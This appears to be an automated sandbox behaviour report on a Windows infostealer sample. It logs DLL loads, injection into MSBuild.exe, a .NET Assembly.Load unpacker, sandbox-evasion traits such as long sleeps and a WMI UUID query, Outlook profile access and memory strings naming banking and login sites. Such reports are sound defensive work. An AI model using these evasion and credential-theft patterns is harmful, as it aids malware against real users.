Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior

Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Ycj3d5NMhc.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Ycj3d5NMhc.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Ycj3d5NMhc.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: C:\Users\Administrator\Desktop\Outputs\Evop.pdb source: Ycj3d5NMhc.exe

Data Obfuscation

.NET source code contains potential unpacker

Source: Ycj3d5NMhc.exe, PreventFromWeb.cs

.Net Code: FOBDestination System.Reflection.Assembly.Load(byte[])

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0592BFC9 push 9C058843h; retf	3_2_0592BFD5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_059D0C03 push eax; mov dword ptr [esp], ecx	3_2_059D0C14
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_059D22D3 push eax; mov dword ptr [esp], ecx	3_2_059D22E4

Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API/Special instruction interceptor: Address: 7FFBCB7AD6E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API/Special instruction interceptor: Address: 7FFBCB7AD504
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API/Special instruction interceptor: Address: 7FFBCB7ADA04
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API/Special instruction interceptor: Address: 7FFBCB7AD6C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API/Special instruction interceptor: Address: 7FFBCB7ADAA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API/Special instruction interceptor: Address: 7FFBCB7AD0E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API/Special instruction interceptor: Address: 7FFBCB7AD784
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API/Special instruction interceptor: Address: 7FFBCB7AD384
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API/Special instruction interceptor: Address: 7FFBCB7AD424
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API/Special instruction interceptor: Address: 7FFBCB7AE654
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API/Special instruction interceptor: Address: 7FFBCB7AD304
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API/Special instruction interceptor: Address: 7FFBCB7AD924
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API/Special instruction interceptor: Address: 7FFBCB7AD244
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API/Special instruction interceptor: Address: 7FFBCB7AD2E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API/Special instruction interceptor: Address: 7FFBCB7AD7A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API/Special instruction interceptor: Address: 7FFBCB7AD664
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API/Special instruction interceptor: Address: 7FFBCB7AD944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API/Special instruction interceptor: Address: 7FFBCB7AD744
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API/Special instruction interceptor: Address: 7FFBCB7AD324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API/Special instruction interceptor: Address: 7FFBCB7AF3F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API/Special instruction interceptor: Address: 7FFBCB7AF314
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API/Special instruction interceptor: Address: 7FFBCB7AD544
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API/Special instruction interceptor: Address: 7FFBCB7AD1A4

Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Memory allocated: D10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Memory allocated: 1A680000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: EB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2940000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 4940000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 623			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 2959			Jump to behavior

Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe TID: 4540	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3840	Thread sleep time: -13835058055282155s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5964	Thread sleep count: 623 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5964	Thread sleep count: 2959 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2340	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 964	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1996	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct

Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: Ycj3d5NMhc.exe, 00000000.00000002.1487067677.0000000000857000.00000004.00000020.00020000.00000000.sdmp, Ycj3d5NMhc.exe, 00000000.00000002.1490876841.000000001B618000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: MSBuild.exe, 00000003.00000002.1530669703.0000000006FC0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: MSBuild.exe, 00000003.00000002.1521409264.0000000000C07000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllo
